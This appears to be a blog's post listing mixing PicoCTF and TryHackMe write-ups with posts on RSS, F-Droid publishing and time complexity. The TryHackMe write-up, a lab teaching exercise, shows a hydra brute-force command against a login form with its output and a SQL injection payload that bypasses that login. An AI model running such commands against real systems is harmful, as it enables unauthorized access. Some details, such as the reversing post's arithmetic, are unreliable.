PrintN – Blog

FactCheck - PicoCTF Write-Up

Wed, 08 Jan 2025 00:00:00 +0000

Hello 👋 Today we’re going to take a look at the challenge FactCheck on PicoCTF by Junias Bonou. The difficulty is medium.

Challenge Description

This binary is putting together some important piece of information… Can you uncover that information? Examine this file. Do you understand its inner workings?

Solution

Let’s start by downloading the file.

wget https://artifacts.picoctf.net/c_titan/186/bin

Running strings on the file gives us a part of the flag.

picoCTF{wELF_d0N3_mate_

Hmmm, let’s do some static analysis with Ghidra. Open the file up in Ghidra and analyze it with the default settings. After doing that we get the code of the main function. Here is the main part of the code.

 std::allocator<char>::allocator();
 /* try { // try from 001012cf to 001012d3 has its CatchHandler @ 00101975 */
 std::__cxx11::basic_string<>::basic_string
 ((char *)local_248,(allocator *)"picoCTF{wELF_d0N3_mate_");
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 0010130a to 0010130e has its CatchHandler @ 00101996 */
 std::__cxx11::basic_string<>::basic_string((char *)local_228,(allocator *)&DAT_0010201d);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101345 to 00101349 has its CatchHandler @ 001019b1 */
 std::__cxx11::basic_string<>::basic_string((char *)local_208,(allocator *)&DAT_0010201f);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101380 to 00101384 has its CatchHandler @ 001019cc */
 std::__cxx11::basic_string<>::basic_string((char *)local_1e8,(allocator *)&DAT_00102021);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 001013bb to 001013bf has its CatchHandler @ 001019e7 */
 std::__cxx11::basic_string<>::basic_string((char *)local_1c8,(allocator *)&DAT_0010201d);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 001013f6 to 001013fa has its CatchHandler @ 00101a02 */
 std::__cxx11::basic_string<>::basic_string((char *)local_1a8,(allocator *)&DAT_00102023);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101431 to 00101435 has its CatchHandler @ 00101a1d */
 std::__cxx11::basic_string<>::basic_string((char *)local_188,(allocator *)&DAT_00102025);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 0010146c to 00101470 has its CatchHandler @ 00101a38 */
 std::__cxx11::basic_string<>::basic_string((char *)local_168,(allocator *)&DAT_00102027);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 001014a7 to 001014ab has its CatchHandler @ 00101a53 */
 std::__cxx11::basic_string<>::basic_string((char *)local_148,(allocator *)&DAT_00102029);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 001014e2 to 001014e6 has its CatchHandler @ 00101a6e */
 std::__cxx11::basic_string<>::basic_string((char *)local_128,(allocator *)&DAT_0010202b);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 0010151d to 00101521 has its CatchHandler @ 00101a89 */
 std::__cxx11::basic_string<>::basic_string((char *)local_108,(allocator *)&DAT_0010202d);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101558 to 0010155c has its CatchHandler @ 00101aa4 */
 std::__cxx11::basic_string<>::basic_string((char *)local_e8,(allocator *)&DAT_00102025);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101593 to 00101597 has its CatchHandler @ 00101abf */
 std::__cxx11::basic_string<>::basic_string((char *)local_c8,(allocator *)&DAT_0010202f);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 001015ce to 001015d2 has its CatchHandler @ 00101ada */
 std::__cxx11::basic_string<>::basic_string((char *)local_a8,(allocator *)&DAT_00102031);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101606 to 0010160a has its CatchHandler @ 00101af5 */
 std::__cxx11::basic_string<>::basic_string((char *)local_88,(allocator *)&DAT_00102033);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 0010163e to 00101642 has its CatchHandler @ 00101b0d */
 std::__cxx11::basic_string<>::basic_string((char *)local_68,(allocator *)&DAT_0010201d);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101676 to 0010167a has its CatchHandler @ 00101b25 */
 std::__cxx11::basic_string<>::basic_string((char *)local_48,(allocator *)&DAT_00102033);
 std::allocator<char>::~allocator(&local_249);
 /* try { // try from 00101699 to 0010185f has its CatchHandler @ 00101b3d */
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)local_208);
 if (*pcVar2 < 'B') {
 std::__cxx11::basic_string<>::operator+=(local_248,local_c8);
 }
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)local_a8);
 if (*pcVar2 != 'A') {
 std::__cxx11::basic_string<>::operator+=(local_248,local_68);
 }
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)local_1c8);
 cVar1 = *pcVar2;
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)local_148);
 if ((int)cVar1 - (int)*pcVar2 == 3) {
 std::__cxx11::basic_string<>::operator+=(local_248,local_1c8);
 }
 std::__cxx11::basic_string<>::operator+=(local_248,local_1e8);
 std::__cxx11::basic_string<>::operator+=(local_248,local_188);
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)local_168);
 if (*pcVar2 == 'G') {
 std::__cxx11::basic_string<>::operator+=(local_248,local_168);
 }

We can see that it first gives us the first part of the flag. Let’s start by changing the variable names for all the basic string functions to the character they each represent. We can do that by double-clicking on the &DAT_, and it will show us the character, and then just simply rename the variable name. Once done, it should look something like this.

ℹ️

Each flag is unique, so your characters will be different from mine

 std::allocator<char>::allocator();
 /* try { // try from 001012cf to 001012d3 has its CatchHandler @ 00101975 */
 std::__cxx11::basic_string<>::basic_string
 ((char *)local_248,(allocator *)"picoCTF{wELF_d0N3_mate_");
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 0010130a to 0010130e has its CatchHandler @ 00101996 */
 std::__cxx11::basic_string<>::basic_string((char *)char_3,(allocator *)&DAT_0010201d);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101345 to 00101349 has its CatchHandler @ 001019b1 */
 std::__cxx11::basic_string<>::basic_string((char *)char_5,(allocator *)&DAT_0010201f);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101380 to 00101384 has its CatchHandler @ 001019cc */
 std::__cxx11::basic_string<>::basic_string((char *)char_9,(allocator *)&DAT_00102021);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 001013bb to 001013bf has its CatchHandler @ 001019e7 */
 std::__cxx11::basic_string<>::basic_string((char *)char2_3,(allocator *)&DAT_0010201d);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 001013f6 to 001013fa has its CatchHandler @ 00101a02 */
 std::__cxx11::basic_string<>::basic_string((char *)char_4,(allocator *)&DAT_00102023);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101431 to 00101435 has its CatchHandler @ 00101a1d */
 std::__cxx11::basic_string<>::basic_string((char *)char_b,(allocator *)&DAT_00102025);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 0010146c to 00101470 has its CatchHandler @ 00101a38 */
 std::__cxx11::basic_string<>::basic_string((char *)char_a,(allocator *)&DAT_00102027);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 001014a7 to 001014ab has its CatchHandler @ 00101a53 */
 std::__cxx11::basic_string<>::basic_string((char *)char_e,(allocator *)&DAT_00102029);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 001014e2 to 001014e6 has its CatchHandler @ 00101a6e */
 std::__cxx11::basic_string<>::basic_string((char *)char_f,(allocator *)&DAT_0010202b);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 0010151d to 00101521 has its CatchHandler @ 00101a89 */
 std::__cxx11::basic_string<>::basic_string((char *)char_d,(allocator *)&DAT_0010202d);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101558 to 0010155c has its CatchHandler @ 00101aa4 */
 std::__cxx11::basic_string<>::basic_string((char *)char2_b,(allocator *)&DAT_00102025);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101593 to 00101597 has its CatchHandler @ 00101abf */
 std::__cxx11::basic_string<>::basic_string((char *)char_2,(allocator *)&DAT_0010202f);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 001015ce to 001015d2 has its CatchHandler @ 00101ada */
 std::__cxx11::basic_string<>::basic_string((char *)char_6,(allocator *)&DAT_00102031);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101606 to 0010160a has its CatchHandler @ 00101af5 */
 std::__cxx11::basic_string<>::basic_string((char *)char_8,(allocator *)&DAT_00102033);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 0010163e to 00101642 has its CatchHandler @ 00101b0d */
 std::__cxx11::basic_string<>::basic_string((char *)char3_3,(allocator *)&DAT_0010201d);
 std::allocator<char>::~allocator(&local_249);
 std::allocator<char>::allocator();
 /* try { // try from 00101676 to 0010167a has its CatchHandler @ 00101b25 */
 std::__cxx11::basic_string<>::basic_string((char *)char2_8,(allocator *)&DAT_00102033);
 std::allocator<char>::~allocator(&local_249);
 /* try { // try from 00101699 to 0010185f has its CatchHandler @ 00101b3d */
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)char_5);
 if (*pcVar2 < 'B') {
 std::__cxx11::basic_string<>::operator+=(local_248,char_2);
 }
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)char_6);
 if (*pcVar2 != 'A') {
 std::__cxx11::basic_string<>::operator+=(local_248,char3_3);
 }
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)char2_3);
 cVar1 = *pcVar2;
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)char_e);
 if ((int)cVar1 - (int)*pcVar2 == 3) {
 std::__cxx11::basic_string<>::operator+=(local_248,char2_3);
 }
 std::__cxx11::basic_string<>::operator+=(local_248,char_9);
 std::__cxx11::basic_string<>::operator+=(local_248,char_b);
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)char_a);
 if (*pcVar2 == 'G') {
 std::__cxx11::basic_string<>::operator+=(local_248,char_a);
 }
 std::__cxx11::basic_string<>::operator+=(local_248,char_4);
 std::__cxx11::basic_string<>::operator+=(local_248,char_8);
 std::__cxx11::basic_string<>::operator+=(local_248,char_3);
 std::__cxx11::basic_string<>::operator+=(local_248,char_f);
 std::__cxx11::basic_string<>::operator+=(local_248,'}');
 std::__cxx11::basic_string<>::~basic_string(char2_8);
 std::__cxx11::basic_string<>::~basic_string((basic_string<> *)char3_3);
 std::__cxx11::basic_string<>::~basic_string((basic_string<> *)char_8);
 std::__cxx11::basic_string<>::~basic_string(char_6);
 std::__cxx11::basic_string<>::~basic_string((basic_string<> *)char_2);
 std::__cxx11::basic_string<>::~basic_string(char2_b);
 std::__cxx11::basic_string<>::~basic_string(char_d);
 std::__cxx11::basic_string<>::~basic_string((basic_string<> *)char_f);
 std::__cxx11::basic_string<>::~basic_string(char_e);
 std::__cxx11::basic_string<>::~basic_string((basic_string<> *)char_a);
 std::__cxx11::basic_string<>::~basic_string((basic_string<> *)char_b);
 std::__cxx11::basic_string<>::~basic_string((basic_string<> *)char_4);
 std::__cxx11::basic_string<>::~basic_string((basic_string<> *)char2_3);
 std::__cxx11::basic_string<>::~basic_string((basic_string<> *)char_9);
 std::__cxx11::basic_string<>::~basic_string(char_5);
 std::__cxx11::basic_string<>::~basic_string((basic_string<> *)char_3);
 std::__cxx11::basic_string<>::~basic_string(local_248);

Now we can start assembling our flag! First it checks if the ASCII value of 5 is smaller than the ASCII value of B, which is true, as you can see in this ASCII table, so let’s append 2 to the flag.

 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)char_5);
 if (*pcVar2 < 'B') {
 std::__cxx11::basic_string<>::operator+=(local_248,char_2);
 }

Next up it checks if 6 is not equal to A, and that is true, so we can append 3 to the flag.

 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)char_6);
 if (*pcVar2 != 'A') {
 std::__cxx11::basic_string<>::operator+=(local_248,char3_3);
 }

Next it checks if the ASCII value of 3 - ASCII value of e = ASCII value of 3, which it’s not, as 51 - 101 = 50, so we don’t append 3 to the flag.

 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)char2_3);
 cVar1 = *pcVar2;
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)char_e);
 if ((int)cVar1 - (int)*pcVar2 == 3) {
 std::__cxx11::basic_string<>::operator+=(local_248,char2_3);
 }

Next it just adds the characters 9 and b without any checks, and then it checks if ASCII value of a is the same as the ASCII value of G, which it isn’t, so we don’t append anything to the flag.

 std::__cxx11::basic_string<>::operator+=(local_248,char_9);
 std::__cxx11::basic_string<>::operator+=(local_248,char_b);
 pcVar2 = (char *)std::__cxx11::basic_string<>::operator[]((ulong)char_a);
 if (*pcVar2 == 'G') {
 std::__cxx11::basic_string<>::operator+=(local_248,char_a);
 }

And lastly, it just appends the last characters to the flag without any checks.

 std::__cxx11::basic_string<>::operator+=(local_248,char_4);
 std::__cxx11::basic_string<>::operator+=(local_248,char_8);
 std::__cxx11::basic_string<>::operator+=(local_248,char_3);
 std::__cxx11::basic_string<>::operator+=(local_248,char_f);
 std::__cxx11::basic_string<>::operator+=(local_248,'}');

And I end up with this flag, which will be a bit different from yours.

Flag: picoCTF{wELF_d0N3_mate_239b483f}

Why You Should Set Up an RSS Feed

Mon, 09 Dec 2024 00:00:00 +0000

What is RSS?

RSS (Really Simple Syndication) is a way to get updates from your favorite websites and blogs in one place. It’s like a personalized feed that delivers new content from the sites you care about, so you don’t have to constantly check them individually.

Why You Should Start Using RSS

There are many reasons why one should setup a RSS feed. Here are the main reasons.

Productivity: Save time by getting all your favorite content in one place.
Privacy: Your reading habits stay private, no tracking or data selling.
Control: You choose what you see, from who you trust.

Where Can You Use RSS?

RSS is widely supported across the web. You can find RSS feeds on many websites, blogs, and online services. To access RSS feeds, you will need an RSS feed reader / news aggregator.

Best RSS Feeders

Desktop

Linux

GUI: Akregator
CLI: Newsboat

Windows

Fluent

MacOS

Fluent

Mobile

Android

Feeder

iOS

Feeeed

Adding YouTube Channels To Your RSS Feed

To add YouTube channels to your RSS feed, follow these steps:

Find the channel ID of the YouTube channel you want to subscribe to. To find the channel ID of a YouTube channel, go to the channel, add view-source: at the beginning of the URL, then search for channelId in the page source code.
Paste the channel ID together with this URL into your RSS feed reader:

https://youtube.com/feeds/videos.xml?channel_id=

Now you’ll be notified of new videos from your favorite YouTube channels without having to sign in or share your personal information.

Conclusion

RSS feeds are a powerful tool for staying updated, boosting productivity, and protecting your privacy. By using RSS, you can take control of your online experience and enjoy a more focused, efficient, and enjoyable way to consume content. If you want, feel free to subscribe to my RSS feed to get notified when I publish a new post :)

Step-by-Step Guide for Publishing Your Open Source App on F-Droid

Sun, 17 Nov 2024 00:00:00 +0000

F-Droid is an open source app repository that provides a wide range of free and open source applications for Android devices. It offers a user-friendly alternative to Google Play, focusing on privacy and transparency. I just recently published my app to F-Droid, you can check it out here 👉 Human Benchmark.

Prerequisites

A Linux environment (use a virtual machine if you’re on Windows).
The app’s source code must be publicly accessible on a version control system like GitHub.
The repository should include a Fastlane or Triple-T structure.
It must be licensed under a Free/Libre license (check here).
The app should not contain any anti-features and must be fully open source, including all dependencies.

The process of publishing your app to F-Droid can take some time so remember to be patient :)

Publishing Your App On F-Droid (Step-By-Step)

Making a GitLab Account

You need a GitLab account if you don’t have one already, beacuse the F-Droid repository is hosted on GitLab. After registering an account on GitLab, fork the fdroiddata repository.

Setting Up Locally

Next, clone the forked repository to your local machine using git.

git clone https://gitlab.com/[YOUR_USERNAME]/fdroiddata.git

Now, install the fdroidserver so you can build the recipe locally and look for issues. You can install it from source.

git clone https://gitlab.com/fdroid/fdroidserver.git
export PATH="$PATH:$PWD/fdroidserver"

Or install it with apt.

sudo apt install fdroidserver

To ensure fdroid is set up correctly, run the following commands inside the fdroiddata/ directory.

fdroid init
fdroid readmeta

Creating Your Recipe

Now it’s time to create your .yml file, which is the recipe F-Droid will use to build your app from source.

fdroid import --url https://github.com/[YOUR_USERNAME]/[REPO] --subdir app

This will create a .yml file in the metadata/ directory, something like metadata/your.app.id.yml. Open this file with your favorite text editor.

vim metadata/your.app.id.yml

In this file, you will specify how the app should be built and what category it should be in. All the options you can include in your recipe are listed here. For some inspiration you can check out my flutter app recipe out or some of the templates.

Building It

Verify that your recipe is free of syntax errors.

fdroid readmeta

If there are any issues, you can clean up your recipe file.

fdroid rewritemeta your.app.id

Next, automatically populate fields like Auto Name and Current Version by running.

fdroid checkupdates your.app.id

Check for any linting issues that could affect the build.

fdroid lint your.app.id

If all checks pass without errors, you can proceed to build your app.

fdroid build -v -l your.app.id

If you encounter any errors during the build process, refer to Step 5 for common issues and their solutions. If the build completes successfully, you can move on to Step 6.

Common Issues

Binary APK and built APK differ

This error can happen if the binary APK was not built in a Linux environment, since F-Droid’s build server uses Linux. It can also happen if there are discrepancies in the build setup. To avoid this, what I did was explicitly define the build directory as /home/hehe/Desktop/Apps/Mobile in my recipe, ensuring the binary and build APK are the exact same.

sudo:
 - mkdir -p /home/hehe/Desktop/Apps/Mobile
 - chown vagrant /home/hehe/Desktop/Apps/Mobile

prebuild:
 - export repo=/home/hehe/Desktop/Apps/Mobile
 - mv io.github.printn.humanbenchmark $repo/Human-Benchmark
 - pushd $repo/Human-Benchmark
 - export PUB_CACHE=$(pwd)/.pub-cache
 - submodules/.flutter/bin/flutter packages pub get
 - popd

build:
 - export repo=/home/hehe/Desktop/Apps/Mobile
 - submodules/.flutter/bin/flutter build apk

Android SDK licenses not accepted

To resolve this, simply install Android Studio and accept the SDK licenses when prompted.

If you’re still encountering issues, consider progressing to the next step and testing your recipe on the CI/CD pipelines in GitLab.

Merging Your Branch Into Master

git add .
git commit -m "New App: [YOUR_APP_NAME]>"
git remote set-url origin https://gitlab.com/[YOUR_USERNAME]/fdroiddata.git
git push -u origin master

This will trigger a CI/CD pipeline. If all tests pass, you can create a merge request. F-Droid maintainers will review it and provide feedback if necessary.

Getting The F-Droid Badge

Once your app is live, you can add the “Get It On F-Droid” badge to your README.md.

<a href="https://f-droid.org/packages/[YOUR_APP_ID]"><img src="https://f-droid.org/badge/get-it-on.png" width="20%"></a>

Conclusion

I hope this guide has helped you successfully publish your app to F-Droid! If you encounter any issues, don’t hesitate to ask for help on the F-Droid`s forum. Additionally, consider donating to F-Droid to support their mission of providing a free, open, and privacy-respecting app store.

Collaborative Development - PicoCTF Write-Up

Thu, 07 Nov 2024 00:00:00 +0000

Today we’re going to take a look at the challenge Collaborative Development on PicoCTF by Jeffery John. The difficulty is easy.

Challenge Description

My team has been working very hard on new features for our flag printing program! I wonder how they’ll work together? You can download the challenge files here:

challenge.zip

Solution

Let’s begin by extracting the contents of the downloaded .zip file and then navigate to the unzipped directory:

unzip challenge.zip
cd drop-in/

Inside this folder, we notice the presence of a .git directory, which indicates that Git version control has been initialized.

┌──(printn㉿kali)-[~/drop-in]
└─$ ls -la
total 16
drwxr-xr-x 3 printn printn 4096 Mar 11 2024 .
drwx------ 14 printn printn 4096 Nov 7 11:40 ..
drwxr-xr-x 8 printn printn 4096 Mar 11 2024 .git
-rw-r--r-- 1 printn printn 30 Mar 11 2024 flag.py

Let’s try running the flag.py and see what we get.

┌──(printn㉿kali)-[~/drop-in]
└─$ python3 flag.py
Printing the flag...

Hmmm, seems like something may be hidden or unfinished. We can try checking if there are other branches with different code.

┌──(printn㉿kali)-[~/drop-in]
└─$ git branch -a
 feature/part-1
 feature/part-2
 feature/part-3
* main

Let’s switch to the feature/part-1 branch.

┌──(printn㉿kali)-[~/drop-in]
└─$ git checkout feature/part-1
Switched to branch 'feature/part-1'

┌──(printn㉿kali)-[~/drop-in]
└─$ ls -la
total 16
drwxr-xr-x 3 printn printn 4096 Nov 7 11:46 .
drwx------ 14 printn printn 4096 Nov 7 11:40 ..
drwxr-xr-x 8 printn printn 4096 Nov 7 11:46 .git
-rw-rw-r-- 1 printn printn 64 Nov 7 11:46 flag.py

┌──(printn㉿kali)-[~/drop-in]
└─$ python3 flag.py
Printing the flag...
picoCTF{t3@mw0rk_

Great! Now we have the first part of the flag. Instead of manually checking out each branch and assembling the flag, we can use the following command:

┌──(printn㉿kali)-[~/drop-in]
└─$ git checkout feature/part-1 && cat flag.py && git checkout feature/part-2 && cat flag.py && git checkout feature/part-3&& cat flag.py
Switched to branch 'feature/part-1'
print("Printing the flag...")
print("picoCTF{t3@mw0rk_", end='')Switched to branch 'feature/part-2'
print("Printing the flag...")

print("m@k3s_th3_dr3@m_", end='')Switched to branch 'feature/part-3'
print("Printing the flag...")

print("w0rk_6c06cec1}")

Flag: picoCTF{t3@mw0rk_m@k3s_th3_dr3@m_w0rk_6c06cec1}

Lesson Learned? - TryHackMe Write-Up

Mon, 04 Nov 2024 00:00:00 +0000

Today we’re going to take a look at Lesson Learned? room made by TryHackMe and Tib3rius. The difficulty is easy.

The challenge description states there is no rabbit holes or hidden files but we have to treat the box as a real target. Going to the website https://[MACHINE_IP]/ we’re presented with a login form.

Enumeration

Doing a quick nmap scan we find the ports 22 and 80 open.

┌──(printn㉿kali)-[~]
└─$ nmap -sV 10.10.132.122
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-04 11:14 EST
Nmap scan report for 10.10.132.122
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.54 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds

And a gobuster scan also doesn’t return anything of interest.

┌──(printn㉿kali)-[~]
└─$ gobuster dir -u http://10.10.132.122/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.132.122/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/manual (Status: 301) [Size: 315] [--> http://10.10.132.122/manual/]

OSINT

We have been told that we have to treat it like an real target so let’s try doing some Open Source Intelligence (OSINT). When checking out the room creator Tib3rius out on his X / Twitter account we find some interesting posts regarding best practices with SQL injections and the dangers of using OR 1=1.

https://x.com/0xTib3rius/status/1624819441044185088

Doing a quick search of what the risks are on using OR 1=1 in a SQL injection we get this article https://tcm-sec.com/avoid-or-1-equals-1-in-sql-injections/

Bruteforcing

We’ll use hydra for the bruteforcing the username with the xato-net-10-million-usernames wordlist from SecLists.

If you don’t have it, download it with the following command.

wget https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/xato-net-10-million-usernames.txt

┌──(printn㉿kali)-[~]
└─$ hydra -L /usr/share/wordlists/xato-net-10-million-usernames.txt -p pass 10.10.132.122 http-post-form "/:username=^USER^&password=^PASS^:Invalid username and password."
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-04 12:04:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking http-post-form://10.10.132.122:80/:username=^USER^&password=^PASS^:Invalid username and password.
[80][http-post-form] host: 10.10.132.122 login: martin password: pass
[80][http-post-form] host: 10.10.132.122 login: patrick password: pass
[80][http-post-form] host: 10.10.132.122 login: stuart password: pass
[80][http-post-form] host: 10.10.132.122 login: marcus password: pass
[80][http-post-form] host: 10.10.132.122 login: kelly password: pass
[80][http-post-form] host: 10.10.132.122 login: arnold password: pass
[80][http-post-form] host: 10.10.132.122 login: Martin password: pass
[80][http-post-form] host: 10.10.132.122 login: karen password: pass
[80][http-post-form] host: 10.10.132.122 login: Patrick password: pass

SQL Injection

Great so now we got some usernames we can use, now it’s time for the SQL injection. By using our knowledge from the post and the article we can craft the injection while ensuring we don’t erase the database.

We craft the injection martin' AND '1'='1'-- - which we could also shorten to martin'-- -.

And we receive the flag 🥳 and an explanation about the risks of using OR 1=1 in SQL injections.

How To Calculate Time Complexity

Mon, 28 Oct 2024 00:00:00 +0000

Time complexity measures how the time to complete an algorithm grows with the size of its input. Understanding time complexity is crucial for optimizing performance in software development.

Time Complexity vs. Space Complexity

Time Complexity: Focuses on how long an algorithm takes to run.
Space Complexity: Relates to how much memory an algorithm uses.

Both are essential for efficient software design, as improving one may impact the other.

Different notations for time complexity

There are many notations available to compute time complexity:

Big O Notation: O
Omega Notation: Ω
Theta Notation: θ

Our focus is on the Big O Notation today, as it’s widely used by developers.

What is Big O Notation?

Image from www.bigocheatsheet.com

Big O notation provides a way to express the performance of an algorithm. It highlights how the running time or space requirements grow relative to the input size, focusing on the most significant factors and ignoring constant factors.

Common Big O Notations

O(1): Constant time (e.g. accessing an element in an array).
O(n): Linear time (e.g. looping through an array).
O(n²): Quadratic time (e.g. nested loops).
O(log n): Logarithmic time (e.g. binary search).

How to Calculate Time Complexity

Time complexity is a way to describe how the execution time of a program changes with the size of the input. Let’s explore different examples in Python to illustrate various time complexities.

Example 1: Time Complexity O(n)

Here’s a simple program that demonstrates O(n) complexity:

def print_numbers(n):
 for i in range(n):
 print(i) # Executed n times

n = int(input("Enter a number: "))
print_numbers(n)

Time Complexity: O(n)

Explanation: The for loop runs n times. If you double the value of n, the time taken by the program also approximately doubles. This is a linear relationship.

Example 2: Time Complexity O(1)

Next, consider this snippet that executes a fixed number of operations:

def constant_time_operations():
 a = 5
 b = 10
 sum = a + b # Single operation
 print("Sum:", sum)

constant_time_operations()

Time Complexity: O(1)

Explanation: This function performs a fixed number of operations (two assignments and an addition) regardless of any input size. It runs in constant time.

Example 3: Time Complexity O(n + 3)

Now, let’s look at a program that includes both a loop and some constant-time operations:

def loop_with_constant_operations(n):
 for i in range(n):
 print(i) # Executed n times
 print("Done!") # This is executed once

n = int(input("Enter a number: "))
loop_with_constant_operations(n)

Time Complexity: O(n + 3)

Explanation: The loop runs n times, and there are three constant-time operations (two assignments and a print statement). For larger values of n, the constant terms (like +3) becomes petty, so we simplify this to O(n).

Example 4: Time Complexity O(n²)

Here’s an example of a nested loop, which results in quadratic time complexity:

def print_pairs(n):
 for i in range(n):
 for j in range(n):
 print(i, j) # Executed n * n times

n = int(input("Enter a number: "))
print_pairs(n)

Time Complexity: O(n²)

Explanation: Both loops run n times. Thus, the total number of iterations is n * n, which results in quadratic time complexity.

Example 5: Time Complexity O(log n)

Finally, let’s consider the binary search algorithm, which has logarithmic time complexity:

def binary_search(arr, target):
 left, right = 0, len(arr) - 1

 while left <= right:
 mid = (left + right) // 2
 if arr[mid] == target:
 return mid # Target found
 elif arr[mid] < target:
 left = mid + 1 # Search right half
 else:
 right = mid - 1 # Search left half
 return -1 # Target not found

# Example usage
arr = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
target = 7
result = binary_search(arr, target)
print("Target found at index:", result)

Time Complexity: O(log n)

Explanation:
- Halving the Search Space: Each comparison splits the array in half. If the array has n elements, after the first check, it narrows to n / 2, then n / 4, and so on.
- Fewer Comparisons: For an array of 1,024 elements, it takes only about 10 comparisons to find a target or determine it’s absent.
This halving results in O(log n) time complexity, meaning the algorithm scales efficiently with larger arrays.

Summary

O(n): Linear time complexity (e.g. single loop).

O(1): Constant time complexity (e.g. simple arithmetic).

O(n + 3): Linear time with constant operations (simplifies to O(n)).

O(n²): Quadratic time complexity (e.g. nested loops).

O(log n): Logarithmic time complexity (e.g. binary search on a sorted array).

Understanding these examples helps you recognize how different algorithms perform as input sizes change, guiding you in selecting the most efficient algorithm for your needs.

Redaction gone wrong - PicoCTF Write-Up

Thu, 24 Oct 2024 00:00:00 +0000

Hello! 👋 Today, we’re going to take a look at the ‘Redaction gone wrong’ challenge on PicoCTF by Mubarak Mikail. The difficulty level is medium.

Challenge Description

Now you DON’T see me. This report has some critical data in it, some of which have been redacted correctly, while some were not. Can you find an important key that was not redacted properly?

Solution

Let’s start by opening the provided PDF file. It looks like we have a financial report but there are some words that have been redacted. Based on the challenge description we know that there are some redacted words that were not redacted correctly.

Let’s try to find some mis-redacted words by selecting all the text in the PDF file with CTRL+A and simply pasting it with CTRL+V.

Financial Report for ABC Labs, Kigali, Rwanda for the year 2021.
Breakdown - Just painted over in MS word.
Cost Benefit Analysis
Credit Debit
This is not the flag, keep looking
Expenses from the
picoCTF{C4n_Y0u_S33_m3_fully}
